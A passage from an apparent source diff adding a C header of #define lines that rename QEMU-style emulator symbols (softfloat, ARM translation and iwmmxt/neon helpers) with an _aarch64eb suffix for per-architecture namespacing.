+#define dbgbvr_write dbgbvr_write_aarch64eb +#define dbgwcr_write dbgwcr_write_aarch64eb +#define dbgwvr_write dbgwvr_write_aarch64eb +#define debug_cp_reginfo debug_cp_reginfo_aarch64eb +#define debug_frame debug_frame_aarch64eb +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_aarch64eb +#define define_arm_cp_regs define_arm_cp_regs_aarch64eb +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_aarch64eb +#define define_debug_regs define_debug_regs_aarch64eb +#define define_one_arm_cp_reg define_one_arm_cp_reg_aarch64eb +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_aarch64eb +#define deposit32 deposit32_aarch64eb +#define deposit64 deposit64_aarch64eb +#define deregister_tm_clones deregister_tm_clones_aarch64eb +#define device_class_base_init device_class_base_init_aarch64eb +#define device_class_init device_class_init_aarch64eb +#define device_finalize device_finalize_aarch64eb +#define device_get_realized device_get_realized_aarch64eb +#define device_initfn device_initfn_aarch64eb +#define device_post_init device_post_init_aarch64eb +#define device_reset device_reset_aarch64eb +#define device_set_realized device_set_realized_aarch64eb +#define device_type_info device_type_info_aarch64eb +#define disas_arm_insn disas_arm_insn_aarch64eb +#define disas_coproc_insn disas_coproc_insn_aarch64eb +#define disas_dsp_insn disas_dsp_insn_aarch64eb +#define disas_iwmmxt_insn disas_iwmmxt_insn_aarch64eb +#define disas_neon_data_insn disas_neon_data_insn_aarch64eb +#define disas_neon_ls_insn disas_neon_ls_insn_aarch64eb +#define disas_thumb2_insn disas_thumb2_insn_aarch64eb +#define disas_thumb_insn disas_thumb_insn_aarch64eb +#define disas_vfp_insn disas_vfp_insn_aarch64eb +#define disas_vfp_v8_insn disas_vfp_v8_insn_aarch64eb +#define do_arm_semihosting do_arm_semihosting_aarch64eb +#define do_clz16 do_clz16_aarch64eb +#define do_clz8 do_clz8_aarch64eb +#define do_constant_folding do_constant_folding_aarch64eb +#define 
do_constant_folding_2 do_constant_folding_2_aarch64eb +#define do_constant_folding_cond do_constant_folding_cond_aarch64eb +#define do_constant_folding_cond2 do_constant_folding_cond2_aarch64eb +#define do_constant_folding_cond_32 do_constant_folding_cond_32_aarch64eb +#define do_constant_folding_cond_64 do_constant_folding_cond_64_aarch64eb +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_aarch64eb +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_aarch64eb +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_aarch64eb +#define do_ssat do_ssat_aarch64eb +#define do_usad do_usad_aarch64eb +#define do_usat do_usat_aarch64eb +#define do_v7m_exception_exit do_v7m_exception_exit_aarch64eb +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_aarch64eb +#define dummy_func dummy_func_aarch64eb +#define dummy_section dummy_section_aarch64eb +#define _DYNAMIC _DYNAMIC_aarch64eb +#define _edata _edata_aarch64eb +#define _end _end_aarch64eb +#define end_list end_list_aarch64eb +#define eq128 eq128_aarch64eb +#define ErrorClass_lookup ErrorClass_lookup_aarch64eb +#define error_copy error_copy_aarch64eb +#define error_exit error_exit_aarch64eb +#define error_get_class error_get_class_aarch64eb +#define error_get_pretty error_get_pretty_aarch64eb +#define error_setg_file_open error_setg_file_open_aarch64eb +#define estimateDiv128To64 estimateDiv128To64_aarch64eb +#define estimateSqrt32 estimateSqrt32_aarch64eb +#define excnames excnames_aarch64eb +#define excp_is_internal excp_is_internal_aarch64eb +#define extended_addresses_enabled extended_addresses_enabled_aarch64eb +#define extended_mpu_ap_bits extended_mpu_ap_bits_aarch64eb +#define extract32 extract32_aarch64eb +#define extract64 extract64_aarch64eb +#define extractFloat128Exp extractFloat128Exp_aarch64eb +#define extractFloat128Frac0 extractFloat128Frac0_aarch64eb +#define extractFloat128Frac1 extractFloat128Frac1_aarch64eb +#define extractFloat128Sign extractFloat128Sign_aarch64eb +#define extractFloat16Exp 
extractFloat16Exp_aarch64eb +#define extractFloat16Frac extractFloat16Frac_aarch64eb +#define extractFloat16Sign extractFloat16Sign_aarch64eb +#define extractFloat32Exp extractFloat32Exp_aarch64eb +#define extractFloat32Frac extractFloat32Frac_aarch64eb +#define extractFloat32Sign extractFloat32Sign_aarch64eb +#define extractFloat64Exp extractFloat64Exp_aarch64eb +#define extractFloat64Frac extractFloat64Frac_aarch64eb +#define extractFloat64Sign extractFloat64Sign_aarch64eb +#define extractFloatx80Exp extractFloatx80Exp_aarch64eb +#define extractFloatx80Frac extractFloatx80Frac_aarch64eb +#define extractFloatx80Sign extractFloatx80Sign_aarch64eb +#define fcse_write fcse_write_aarch64eb +#define find_better_copy find_better_copy_aarch64eb +#define find_default_machine find_default_machine_aarch64eb +#define find_desc_by_name find_desc_by_name_aarch64eb +#define find_first_bit find_first_bit_aarch64eb +#define find_paging_enabled_cpu find_paging_enabled_cpu_aarch64eb +#define find_ram_block find_ram_block_aarch64eb +#define find_ram_offset find_ram_offset_aarch64eb +#define find_string find_string_aarch64eb +#define find_type find_type_aarch64eb +#define _fini _fini_aarch64eb +#define flatrange_equal flatrange_equal_aarch64eb +#define flatview_destroy flatview_destroy_aarch64eb +#define flatview_init flatview_init_aarch64eb +#define flatview_insert flatview_insert_aarch64eb +#define flatview_lookup flatview_lookup_aarch64eb +#define flatview_ref flatview_ref_aarch64eb +#define flatview_simplify flatview_simplify_aarch64eb +#define flatview_unref flatview_unref_aarch64eb +#define float128_add float128_add_aarch64eb +#define float128_compare float128_compare_aarch64eb +#define float128_compare_internal float128_compare_internal_aarch64eb +#define float128_compare_quiet float128_compare_quiet_aarch64eb +#define float128_default_nan float128_default_nan_aarch64eb +#define float128_div float128_div_aarch64eb +#define float128_eq float128_eq_aarch64eb +#define 
float128_eq_quiet float128_eq_quiet_aarch64eb +#define float128_is_quiet_nan float128_is_quiet_nan_aarch64eb +#define float128_is_signaling_nan float128_is_signaling_nan_aarch64eb +#define float128_le float128_le_aarch64eb +#define float128_le_quiet float128_le_quiet_aarch64eb +#define float128_lt float128_lt_aarch64eb +#define float128_lt_quiet float128_lt_quiet_aarch64eb +#define float128_maybe_silence_nan float128_maybe_silence_nan_aarch64eb +#define float128_mul float128_mul_aarch64eb +#define float128_rem float128_rem_aarch64eb +#define float128_round_to_int float128_round_to_int_aarch64eb +#define float128_scalbn float128_scalbn_aarch64eb +#define float128_sqrt float128_sqrt_aarch64eb +#define float128_sub float128_sub_aarch64eb +#define float128ToCommonNaN float128ToCommonNaN_aarch64eb +#define float128_to_float32 float128_to_float32_aarch64eb +#define float128_to_float64 float128_to_float64_aarch64eb +#define float128_to_floatx80 float128_to_floatx80_aarch64eb +#define float128_to_int32 float128_to_int32_aarch64eb +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_aarch64eb +#define float128_to_int64 float128_to_int64_aarch64eb +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_aarch64eb +#define float128_unordered float128_unordered_aarch64eb +#define float128_unordered_quiet float128_unordered_quiet_aarch64eb +#define float16_default_nan float16_default_nan_aarch64eb +#define float16_is_quiet_nan float16_is_quiet_nan_aarch64eb +#define float16_is_signaling_nan float16_is_signaling_nan_aarch64eb +#define float16_maybe_silence_nan float16_maybe_silence_nan_aarch64eb +#define float16ToCommonNaN float16ToCommonNaN_aarch64eb +#define float16_to_float32 float16_to_float32_aarch64eb +#define float16_to_float64 float16_to_float64_aarch64eb +#define float32_abs float32_abs_aarch64eb +#define float32_add float32_add_aarch64eb +#define float32_chs float32_chs_aarch64eb +#define float32_compare float32_compare_aarch64eb 
+#define float32_compare_internal float32_compare_internal_aarch64eb +#define float32_compare_quiet float32_compare_quiet_aarch64eb +#define float32_default_nan float32_default_nan_aarch64eb +#define float32_div float32_div_aarch64eb +#define float32_eq float32_eq_aarch64eb +#define float32_eq_quiet float32_eq_quiet_aarch64eb +#define float32_exp2 float32_exp2_aarch64eb +#define float32_exp2_coefficients float32_exp2_coefficients_aarch64eb +#define float32_is_any_nan float32_is_any_nan_aarch64eb +#define float32_is_infinity float32_is_infinity_aarch64eb +#define float32_is_neg float32_is_neg_aarch64eb +#define float32_is_quiet_nan float32_is_quiet_nan_aarch64eb +#define float32_is_signaling_nan float32_is_signaling_nan_aarch64eb +#define float32_is_zero float32_is_zero_aarch64eb +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_aarch64eb +#define float32_le float32_le_aarch64eb +#define float32_le_quiet float32_le_quiet_aarch64eb +#define float32_log2 float32_log2_aarch64eb +#define float32_lt float32_lt_aarch64eb +#define float32_lt_quiet float32_lt_quiet_aarch64eb +#define float32_max float32_max_aarch64eb +#define float32_maxnum float32_maxnum_aarch64eb +#define float32_maxnummag float32_maxnummag_aarch64eb +#define float32_maybe_silence_nan float32_maybe_silence_nan_aarch64eb +#define float32_min float32_min_aarch64eb +#define float32_minmax float32_minmax_aarch64eb +#define float32_minnum float32_minnum_aarch64eb +#define float32_minnummag float32_minnummag_aarch64eb +#define float32_mul float32_mul_aarch64eb +#define float32_muladd float32_muladd_aarch64eb +#define float32_rem float32_rem_aarch64eb +#define float32_round_to_int float32_round_to_int_aarch64eb +#define float32_scalbn float32_scalbn_aarch64eb +#define float32_set_sign float32_set_sign_aarch64eb +#define float32_sqrt float32_sqrt_aarch64eb +#define float32_squash_input_denormal float32_squash_input_denormal_aarch64eb +#define float32_sub float32_sub_aarch64eb +#define 
float32ToCommonNaN float32ToCommonNaN_aarch64eb +#define float32_to_float128 float32_to_float128_aarch64eb +#define float32_to_float16 float32_to_float16_aarch64eb +#define float32_to_float64 float32_to_float64_aarch64eb +#define float32_to_floatx80 float32_to_floatx80_aarch64eb +#define float32_to_int16 float32_to_int16_aarch64eb +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_aarch64eb +#define float32_to_int32 float32_to_int32_aarch64eb +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_aarch64eb +#define float32_to_int64 float32_to_int64_aarch64eb +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_aarch64eb +#define float32_to_uint16 float32_to_uint16_aarch64eb +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_aarch64eb +#define float32_to_uint32 float32_to_uint32_aarch64eb +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_aarch64eb +#define float32_to_uint64 float32_to_uint64_aarch64eb +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_aarch64eb +#define float32_unordered float32_unordered_aarch64eb +#define float32_unordered_quiet float32_unordered_quiet_aarch64eb +#define float64_abs float64_abs_aarch64eb +#define float64_add float64_add_aarch64eb +#define float64_chs float64_chs_aarch64eb +#define float64_compare float64_compare_aarch64eb +#define float64_compare_internal float64_compare_internal_aarch64eb +#define float64_compare_quiet float64_compare_quiet_aarch64eb +#define float64_default_nan float64_default_nan_aarch64eb +#define float64_div float64_div_aarch64eb +#define float64_eq float64_eq_aarch64eb +#define float64_eq_quiet float64_eq_quiet_aarch64eb +#define float64_is_any_nan float64_is_any_nan_aarch64eb +#define float64_is_infinity float64_is_infinity_aarch64eb +#define float64_is_neg float64_is_neg_aarch64eb +#define float64_is_quiet_nan float64_is_quiet_nan_aarch64eb +#define float64_is_signaling_nan 
float64_is_signaling_nan_aarch64eb +#define float64_is_zero float64_is_zero_aarch64eb +#define float64_le float64_le_aarch64eb +#define float64_le_quiet float64_le_quiet_aarch64eb +#define float64_log2 float64_log2_aarch64eb +#define float64_lt float64_lt_aarch64eb +#define float64_lt_quiet float64_lt_quiet_aarch64eb +#define float64_max float64_max_aarch64eb +#define float64_maxnum float64_maxnum_aarch64eb +#define float64_maxnummag float64_maxnummag_aarch64eb +#define float64_maybe_silence_nan float64_maybe_silence_nan_aarch64eb +#define float64_min float64_min_aarch64eb +#define float64_minmax float64_minmax_aarch64eb +#define float64_minnum float64_minnum_aarch64eb +#define float64_minnummag float64_minnummag_aarch64eb +#define float64_mul float64_mul_aarch64eb +#define float64_muladd float64_muladd_aarch64eb +#define float64_rem float64_rem_aarch64eb +#define float64_round_to_int float64_round_to_int_aarch64eb +#define float64_scalbn float64_scalbn_aarch64eb +#define float64_set_sign float64_set_sign_aarch64eb +#define float64_sqrt float64_sqrt_aarch64eb +#define float64_squash_input_denormal float64_squash_input_denormal_aarch64eb +#define float64_sub float64_sub_aarch64eb +#define float64ToCommonNaN float64ToCommonNaN_aarch64eb +#define float64_to_float128 float64_to_float128_aarch64eb +#define float64_to_float16 float64_to_float16_aarch64eb +#define float64_to_float32 float64_to_float32_aarch64eb +#define float64_to_floatx80 float64_to_floatx80_aarch64eb +#define float64_to_int16 float64_to_int16_aarch64eb +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_aarch64eb +#define float64_to_int32 float64_to_int32_aarch64eb +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_aarch64eb +#define float64_to_int64 float64_to_int64_aarch64eb +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_aarch64eb +#define float64_to_uint16 float64_to_uint16_aarch64eb +#define float64_to_uint16_round_to_zero 
float64_to_uint16_round_to_zero_aarch64eb +#define float64_to_uint32 float64_to_uint32_aarch64eb +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_aarch64eb +#define float64_to_uint64 float64_to_uint64_aarch64eb +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_aarch64eb +#define float64_trunc_to_int float64_trunc_to_int_aarch64eb +#define float64_unordered float64_unordered_aarch64eb +#define float64_unordered_quiet float64_unordered_quiet_aarch64eb +#define float_raise float_raise_aarch64eb +#define floatx80_add floatx80_add_aarch64eb +#define floatx80_compare floatx80_compare_aarch64eb +#define floatx80_compare_internal floatx80_compare_internal_aarch64eb +#define floatx80_compare_quiet floatx80_compare_quiet_aarch64eb +#define floatx80_default_nan floatx80_default_nan_aarch64eb +#define floatx80_div floatx80_div_aarch64eb +#define floatx80_eq floatx80_eq_aarch64eb +#define floatx80_eq_quiet floatx80_eq_quiet_aarch64eb +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_aarch64eb +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_aarch64eb +#define floatx80_le floatx80_le_aarch64eb +#define floatx80_le_quiet floatx80_le_quiet_aarch64eb +#define floatx80_lt floatx80_lt_aarch64eb +#define floatx80_lt_quiet floatx80_lt_quiet_aarch64eb +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_aarch64eb +#define floatx80_mul floatx80_mul_aarch64eb +#define floatx80_rem floatx80_rem_aarch64eb +#define floatx80_round_to_int floatx80_round_to_int_aarch64eb +#define floatx80_scalbn floatx80_scalbn_aarch64eb +#define floatx80_sqrt floatx80_sqrt_aarch64eb +#define floatx80_sub floatx80_sub_aarch64eb +#define floatx80ToCommonNaN floatx80ToCommonNaN_aarch64eb +#define floatx80_to_float128 floatx80_to_float128_aarch64eb +#define floatx80_to_float32 floatx80_to_float32_aarch64eb +#define floatx80_to_float64 floatx80_to_float64_aarch64eb +#define floatx80_to_int32 floatx80_to_int32_aarch64eb +#define 
floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_aarch64eb +#define floatx80_to_int64 floatx80_to_int64_aarch64eb +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_aarch64eb +#define floatx80_unordered floatx80_unordered_aarch64eb +#define floatx80_unordered_quiet floatx80_unordered_quiet_aarch64eb +#define flush_icache_range flush_icache_range_aarch64eb +#define format_string format_string_aarch64eb +#define fp_decode_rm fp_decode_rm_aarch64eb +#define frame_dummy frame_dummy_aarch64eb +#define free_range free_range_aarch64eb +#define fstat64 fstat64_aarch64eb +#define futex_wait futex_wait_aarch64eb +#define futex_wake futex_wake_aarch64eb +#define gen_aa32_ld16s gen_aa32_ld16s_aarch64eb +#define gen_aa32_ld16u gen_aa32_ld16u_aarch64eb +#define gen_aa32_ld32u gen_aa32_ld32u_aarch64eb +#define gen_aa32_ld64 gen_aa32_ld64_aarch64eb +#define gen_aa32_ld8s gen_aa32_ld8s_aarch64eb +#define gen_aa32_ld8u gen_aa32_ld8u_aarch64eb +#define gen_aa32_st16 gen_aa32_st16_aarch64eb +#define gen_aa32_st32 gen_aa32_st32_aarch64eb +#define gen_aa32_st64 gen_aa32_st64_aarch64eb +#define gen_aa32_st8 gen_aa32_st8_aarch64eb +#define gen_adc gen_adc_aarch64eb +#define gen_adc_CC gen_adc_CC_aarch64eb +#define gen_add16 gen_add16_aarch64eb +#define gen_add_carry gen_add_carry_aarch64eb +#define gen_add_CC gen_add_CC_aarch64eb +#define gen_add_datah_offset gen_add_datah_offset_aarch64eb +#define gen_add_data_offset gen_add_data_offset_aarch64eb +#define gen_addq gen_addq_aarch64eb +#define gen_addq_lo gen_addq_lo_aarch64eb +#define gen_addq_msw gen_addq_msw_aarch64eb +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_aarch64eb +#define gen_arm_shift_im gen_arm_shift_im_aarch64eb +#define gen_arm_shift_reg gen_arm_shift_reg_aarch64eb +#define gen_bx gen_bx_aarch64eb +#define gen_bx_im gen_bx_im_aarch64eb +#define gen_clrex gen_clrex_aarch64eb +#define generate_memory_topology generate_memory_topology_aarch64eb +#define generic_timer_cp_reginfo 
generic_timer_cp_reginfo_aarch64eb +#define gen_exception gen_exception_aarch64eb +#define gen_exception_insn gen_exception_insn_aarch64eb +#define gen_exception_internal gen_exception_internal_aarch64eb +#define gen_exception_internal_insn gen_exception_internal_insn_aarch64eb +#define gen_exception_return gen_exception_return_aarch64eb +#define gen_goto_tb gen_goto_tb_aarch64eb +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_aarch64eb +#define gen_helper_add_saturate gen_helper_add_saturate_aarch64eb +#define gen_helper_add_setq gen_helper_add_setq_aarch64eb +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_aarch64eb +#define gen_helper_clz32 gen_helper_clz32_aarch64eb +#define gen_helper_clz64 gen_helper_clz64_aarch64eb +#define gen_helper_clz_arm gen_helper_clz_arm_aarch64eb +#define gen_helper_cpsr_read gen_helper_cpsr_read_aarch64eb +#define gen_helper_cpsr_write gen_helper_cpsr_write_aarch64eb +#define gen_helper_crc32_arm gen_helper_crc32_arm_aarch64eb +#define gen_helper_crc32c gen_helper_crc32c_aarch64eb +#define gen_helper_crypto_aese gen_helper_crypto_aese_aarch64eb +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_aarch64eb +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_aarch64eb +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_aarch64eb +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_aarch64eb +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_aarch64eb +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_aarch64eb +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_aarch64eb +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_aarch64eb +#define gen_helper_double_saturate gen_helper_double_saturate_aarch64eb +#define gen_helper_exception_internal gen_helper_exception_internal_aarch64eb +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_aarch64eb +#define gen_helper_get_cp_reg 
gen_helper_get_cp_reg_aarch64eb +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_aarch64eb +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_aarch64eb +#define gen_helper_get_user_reg gen_helper_get_user_reg_aarch64eb +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_aarch64eb +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_aarch64eb +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_aarch64eb +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_aarch64eb +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_aarch64eb +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_aarch64eb +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_aarch64eb +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_aarch64eb +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_aarch64eb +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_aarch64eb +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_aarch64eb +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_aarch64eb +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_aarch64eb +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_aarch64eb +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_aarch64eb +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_aarch64eb +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_aarch64eb +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_aarch64eb +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_aarch64eb +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_aarch64eb +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_aarch64eb +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_aarch64eb +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_aarch64eb +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_aarch64eb +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_aarch64eb +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_aarch64eb 
+#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_aarch64eb +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_aarch64eb +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_aarch64eb +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_aarch64eb +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_aarch64eb +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_aarch64eb +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_aarch64eb +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_aarch64eb +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_aarch64eb +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_aarch64eb +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_aarch64eb +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_aarch64eb +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_aarch64eb +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_aarch64eb +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_aarch64eb +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_aarch64eb +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_aarch64eb +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_aarch64eb +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_aarch64eb +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_aarch64eb +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_aarch64eb +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_aarch64eb +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_aarch64eb +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_aarch64eb +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_aarch64eb +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_aarch64eb +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_aarch64eb +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_aarch64eb +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_aarch64eb +#define 
gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_aarch64eb +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_aarch64eb +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_aarch64eb +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_aarch64eb +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_aarch64eb +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_aarch64eb +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_aarch64eb +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_aarch64eb +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_aarch64eb +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_aarch64eb +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_aarch64eb +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_aarch64eb +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_aarch64eb +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_aarch64eb +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_aarch64eb +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_aarch64eb +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_aarch64eb +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_aarch64eb +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_aarch64eb +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_aarch64eb +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_aarch64eb +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_aarch64eb +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_aarch64eb +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_aarch64eb +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_aarch64eb +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_aarch64eb +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_aarch64eb +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_aarch64eb +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_aarch64eb +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_aarch64eb 
+#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_aarch64eb +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_aarch64eb +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_aarch64eb +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_aarch64eb +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_aarch64eb +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_aarch64eb +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_aarch64eb +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_aarch64eb +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_aarch64eb +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_aarch64eb +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_aarch64eb +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_aarch64eb +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_aarch64eb +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_aarch64eb +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_aarch64eb +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_aarch64eb +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_aarch64eb +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_aarch64eb +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_aarch64eb +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_aarch64eb +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_aarch64eb +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_aarch64eb +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_aarch64eb +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_aarch64eb +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_aarch64eb +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_aarch64eb +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_aarch64eb +#define gen_helper_neon_abd_s16 
